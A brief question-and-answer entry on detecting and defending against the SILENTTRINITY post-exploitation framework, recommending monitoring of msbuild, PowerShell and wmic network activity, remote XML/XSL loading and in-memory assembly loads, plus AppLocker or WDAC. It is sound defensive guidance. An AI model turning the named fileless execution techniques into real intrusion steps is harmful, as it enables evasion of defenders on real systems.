How can an organization detect or defend against SILENTTRINITY?

Defense recommendations include monitoring for unusual execution of msbuild, PowerShell, and wmic with network connections, especially loading from remote XML or XSL files. Tracking process chains and assembly loads from memory can also help; AppLocker or WDAC can block untrusted script engines and fileless execution. For more on memory-based evasion, see AtomBombing Exploitation Analysis.